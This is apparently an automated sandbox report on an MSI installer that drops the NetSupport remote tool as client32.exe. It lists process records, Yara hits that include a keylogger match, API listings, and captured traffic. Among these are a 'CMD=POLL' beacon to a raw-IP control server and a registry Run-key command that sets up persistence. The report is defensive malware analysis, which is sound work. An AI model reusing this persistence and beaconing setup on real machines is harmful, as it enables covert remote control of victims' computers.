Nov 8, 2024 18:59:59.081093073 CET	1104	IN	HTTP/1.1 404 Not Found Date: Fri, 08 Nov 2024 17:59:59 GMT Content-Type: text/html; charset=us-ascii Transfer-Encoding: chunked Connection: keep-alive CF-Ray: 8df775bfda5b3acd-DFW CF-Cache-Status: DYNAMIC cf-apo-via: origin,host Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QY%2Fl%2F%2FjoOpph1oDMhcDTCRKsebVyHvvToXDlnUgDq%2FsleONxcVpLnzArF4Vtn5zVhUMtMneMtWbC1RKTXuv7eni1l8HVLhLxI%2BEeYtaOYTL0qnI%2Bz59VzyWMOaWYkoIqxKf8jQTLhNIqHEns"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare server-timing: cfL4;desc="?proto=TCP&rtt=1049&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49710	95.179.156.158	443	2468	C:\ProgramData\MScreenConnect\client32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 8, 2024 18:59:58.468828917 CET	220	OUT	POST http://95.179.156.158/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 95.179.156.158Connection: Keep-AliveCMD=POLLINFO=1ACK=1 Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49711	172.67.68.212	80	2468	C:\ProgramData\MScreenConnect\client32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 8, 2024 18:59:59.096826077 CET	118	OUT	GET /location/loca.asp HTTP/1.1 Host: geo.netsupportsoftware.com Connection: Keep-Alive Cache-Control: no-cache
Nov 8, 2024 19:00:00.006431103 CET	1102	IN	HTTP/1.1 404 Not Found Date: Fri, 08 Nov 2024 17:59:59 GMT Content-Type: text/html; charset=us-ascii Transfer-Encoding: chunked Connection: keep-alive CF-Ray: 8df775c599186b9a-DFW CF-Cache-Status: DYNAMIC cf-apo-via: origin,host Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1%2Bep3Pj55pfvTlWhv%2BaaCGd5rsOgBCQ34ugK1IAo38AO5rZB%2FpbErjuMPjyQ227gZAuXkw4I0WdRw%2Bhl7DiCFDV21I9Z7NWVNgln5cDuKzBey3SgDIGc52y%2BPPk1bxbUZrDFAmMPMmFLJD1T"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare server-timing: cfL4;desc="?proto=TCP&rtt=1105&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49712	172.67.68.212	80	2468	C:\ProgramData\MScreenConnect\client32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 8, 2024 19:00:00.087197065 CET	118	OUT	GET /location/loca.asp HTTP/1.1 Host: geo.netsupportsoftware.com Connection: Keep-Alive Cache-Control: no-cache
Nov 8, 2024 19:00:00.950584888 CET	1104	IN	HTTP/1.1 404 Not Found Date: Fri, 08 Nov 2024 18:00:00 GMT Content-Type: text/html; charset=us-ascii Transfer-Encoding: chunked Connection: keep-alive CF-Ray: 8df775cb7ae14776-DFW CF-Cache-Status: DYNAMIC cf-apo-via: origin,host Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B6Vtq%2FtGmh0OVUIHUwV%2FTZYsVwArgck2CKP6RiyWhL2j4ZLEv9%2F68bGBZ9NzgAC8IAzOfX6nZmHvbtdRgqHvmq0JGzKlfiJfRP%2FDdMs2WdCzDvtL9qPGJ5wkyPV%2BtH3NabqPSBl%2B4hh3lHF4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare server-timing: cfL4;desc="?proto=TCP&rtt=1832&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0

Target ID:	0
Start time:	12:59:53
Start date:	08/11/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\72BF1aHUKl.msi"
Imagebase:	0x7ff621810000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	12:59:54
Start date:	08/11/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff621810000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	12:59:56
Start date:	08/11/2024
Path:	C:\ProgramData\MScreenConnect\client32.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\MScreenConnect\client32.exe"
Imagebase:	0x830000
File size:	107'376 bytes
MD5 hash:	F6ABEF857450C97EA74CD8F0EB9A8C0A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000003.00000002.4452509174.0000000000832000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000003.00000000.2033005646.0000000000832000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\MScreenConnect\client32.exe, Author: Joe Security
Antivirus matches:	Detection: 12%, ReversingLabs
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	12:59:56
Start date:	08/11/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v ScreenConnect /t REG_SZ /d "C:\ProgramData\MScreenConnect\client32.exe"
Imagebase:	0x7ff73e820000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	12:59:56
Start date:	08/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	13:00:06
Start date:	08/11/2024
Path:	C:\ProgramData\MScreenConnect\client32.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\MScreenConnect\client32.exe"
Imagebase:	0x830000
File size:	107'376 bytes
MD5 hash:	F6ABEF857450C97EA74CD8F0EB9A8C0A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.2133222658.0000000000832000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000000.2132289855.0000000000832000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.2133757091.00000000111CD000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.2133358157.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000002.2133725554.0000000011181000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.2133725554.0000000011181000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	13:00:14
Start date:	08/11/2024
Path:	C:\ProgramData\MScreenConnect\client32.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\MScreenConnect\client32.exe"
Imagebase:	0x830000
File size:	107'376 bytes
MD5 hash:	F6ABEF857450C97EA74CD8F0EB9A8C0A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.2214849103.00000000111CD000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.2214336000.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.2214132599.0000000000832000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.2214810652.0000000011181000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.2214810652.0000000011181000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000000.2213191011.0000000000832000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	113

Executed Functions

Function 110964D0 Relevance: 100.3, APIs: 42, Strings: 15, Instructions: 501
filethreadmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 11095790: GetCurrentProcess.KERNEL32(000F01FF,?,1102E62B,00000000,00000000,00080000,2F623E72,00080000,00000000,00000000), ref: 110957BD
Part of subcall function 11095790: OpenProcessToken.ADVAPI32(00000000), ref: 110957C4
Part of subcall function 11095790: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 110957D5
Part of subcall function 11095790: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 110957F9

LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,2F623E72,00080000,00000000,00000000), ref: 11096565
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109657E
SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 11096589
GetVersionExA.KERNEL32(?), ref: 110965A0
GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109660E
SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 11096623
FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 11096634
CreateFileMappingA.KERNEL32(000000FF,1102E62B,00000004,00000000,?,?), ref: 11096670
GetLastError.KERNEL32 ref: 1109667D
LocalFree.KERNEL32(?), ref: 110966A6
LocalFree.KERNEL32(?), ref: 110966B3
GetLastError.KERNEL32 ref: 110966D0
MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 110966EE
LocalFree.KERNEL32(?), ref: 11096719
LocalFree.KERNEL32(?), ref: 11096726

Part of subcall function 11095700: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,110965BE), ref: 11095708

Part of subcall function 11095740: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 11095754

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11096752
LocalFree.KERNEL32(?), ref: 1109681B
LocalFree.KERNEL32(?), ref: 11096828
_memset.LIBCMT ref: 11096840
GetTickCount.KERNEL32 ref: 11096848
GetCurrentProcessId.KERNEL32 ref: 110968F4
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109690F
CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109695B
GetLastError.KERNEL32 ref: 11096964
GetLastError.KERNEL32(00000000), ref: 1109696B
CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 110969A0
GetLastError.KERNEL32 ref: 110969A9
GetLastError.KERNEL32(00000000), ref: 110969B0
CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 110969E6
GetLastError.KERNEL32 ref: 110969EF
GetLastError.KERNEL32(00000000), ref: 110969F6
CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 11096A2B
GetLastError.KERNEL32 ref: 11096A3A
GetLastError.KERNEL32(00000000), ref: 11096A3D
LocalFree.KERNEL32(?), ref: 11096A65
LocalFree.KERNEL32(?), ref: 11096A72
GetCurrentThreadId.KERNEL32 ref: 11096AA3
CreateThread.KERNEL32(00000000,00002000,Function_00096070,00000000,00000000,00000030), ref: 11096ABD
ResetEvent.KERNEL32(?), ref: 11096AEC
ResetEvent.KERNEL32(?), ref: 11096AF2
ResetEvent.KERNEL32(?), ref: 11096AF8
SetEvent.KERNEL32(?), ref: 11096AFE

Strings

cant map, xrefs: 11096728
Error filemap exists, xrefs: 110967FD
IPC(%s) created, xrefs: 11096B08
Error cant map view, xrefs: 110966FB
Error creating filemap (%d), xrefs: 11096684
Error cant create events, xrefs: 11096B27
cant create thread, xrefs: 11096ACA
cant create filemap, xrefs: 110966B5
S:(ML;;NW;;;LW), xrefs: 110965C8
map exists, xrefs: 1109682A
SeSecurityPrivilege, xrefs: 1109653A
warning map exists, xrefs: 110967D0
cant create events, xrefs: 11096B34
Cant create event %s, e=%d (x%x), xrefs: 11096979, 110969BE, 11096A04, 11096A47
Info - reusing existing filemap, xrefs: 110967B9

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
API String ID: 3291243470-2792520954
Opcode ID: f773c3081aeaebb21c1be5ebe8f63fcd40c310f00c8f4f33c420054a7f1d20a5
Instruction ID: 81383098c44230803e0ca2a3017f0c468739c05f63c930fd52011b603addab5e
Opcode Fuzzy Hash: f773c3081aeaebb21c1be5ebe8f63fcd40c310f00c8f4f33c420054a7f1d20a5
Instruction Fuzzy Hash: 55127FB5E0021D9FDB24DF61CCD4EAEB7F9FB88304F0445A9E51A97240EA71A984CF61

Function 110280F0 Relevance: 89.8, APIs: 39, Strings: 12, Instructions: 534
libraryloadernetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(WinInet.dll,2F623E72,759223A0,?,00000000), ref: 11028125
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110281BF
InternetCloseHandle.WININET(000000FF), ref: 110281CD
SetLastError.KERNEL32(00000078), ref: 110281D3
_malloc.LIBCMT ref: 110281F7
GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11028211
GetLastError.KERNEL32 ref: 11028232
_free.LIBCMT ref: 1102823E
_malloc.LIBCMT ref: 11028247
GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11028261
GetProcAddress.KERNEL32(?,InternetOpenA), ref: 1102829B
InternetOpenA.WININET(11182200,?,?,000000FF,00000000), ref: 110282BA
SetLastError.KERNEL32(00000078), ref: 110282C4
SetLastError.KERNEL32(00000078), ref: 110282D1
SetLastError.KERNEL32(00000078), ref: 110282DB
_free.LIBCMT ref: 110282E5

Part of subcall function 11151665: HeapFree.KERNEL32(00000000,00000000,?,1115A186,00000000,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 1115167B
Part of subcall function 11151665: GetLastError.KERNEL32(00000000,?,1115A186,00000000,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 1115168D

GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11028365
SetLastError.KERNEL32(00000078), ref: 1102837E
GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11028391
InternetConnectA.WININET(000000FF,11187458,00000050,00000000,00000000,00000003,00000000,00000000), ref: 110283AE
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110283CA
SetLastError.KERNEL32(00000078), ref: 110283E3
GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 11028409
GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 1102845D
GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 110285C3
SetLastError.KERNEL32(00000078), ref: 11028690
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110286E2
SetLastError.KERNEL32(00000078), ref: 110286F9
FreeLibrary.KERNEL32(?), ref: 1102870A

Strings

://, xrefs: 11028305
InternetErrorDlg, xrefs: 11028500
InternetQueryDataAvailable, xrefs: 110285BD
InternetCloseHandle, xrefs: 110281B9, 1102835F, 110283C4, 110286DC
HttpQueryInfoA, xrefs: 110284A3
InternetQueryOptionA, xrefs: 1102820B, 1102825B
InternetConnectA, xrefs: 1102838B
InternetOpenA, xrefs: 11028295
GET, xrefs: 11028429
HttpSendRequestA, xrefs: 11028457
WinInet.dll, xrefs: 1102811D
HttpOpenRequestA, xrefs: 11028403

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorLast$Internet$FreeLibrary_free_malloc$CloseConnectHandleHeapLoadOpen
String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
API String ID: 3053051410-913974648
Opcode ID: 690da5286c2fcbb0edb0b08ac36191c1a567465154810799e4197accc4248127
Instruction ID: 1ba2d1776f027d8e66b5c2b51482412bc640081c7f076ce1c4d8da5fffc402e2
Opcode Fuzzy Hash: 690da5286c2fcbb0edb0b08ac36191c1a567465154810799e4197accc4248127
Instruction Fuzzy Hash: AD1280B9D406299FDB12CFA5CC88A9EFBF4EF89304F64855AF416B7244DB705A40CB60

Function 6CC75690 Relevance: 82.6, APIs: 19, Strings: 28, Instructions: 352
threadlibrarynetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6CC62A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 6CC62ACB
Part of subcall function 6CC62A90: _strrchr.LIBCMT ref: 6CC62ADA
Part of subcall function 6CC62A90: _strrchr.LIBCMT ref: 6CC62AEA
Part of subcall function 6CC62A90: wsprintfA.USER32 ref: 6CC62B05

Part of subcall function 6CC7C240: _malloc.LIBCMT ref: 6CC7C259
Part of subcall function 6CC7C240: wsprintfA.USER32 ref: 6CC7C274
Part of subcall function 6CC7C240: _memset.LIBCMT ref: 6CC7C297

LoadLibraryA.KERNEL32(WinInet.dll), ref: 6CC756B7
InitializeCriticalSection.KERNEL32(6CCA9898), ref: 6CC7573F
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6CC7574F
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6CC75775
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6CC7579B
WSAStartup.WSOCK32(00000101,6CCA991A), ref: 6CC757C7
_malloc.LIBCMT ref: 6CC7580D

Part of subcall function 6CC7F8CB: __FF_MSGBANNER.LIBCMT ref: 6CC7F8E4
Part of subcall function 6CC7F8CB: __NMSG_WRITE.LIBCMT ref: 6CC7F8EB
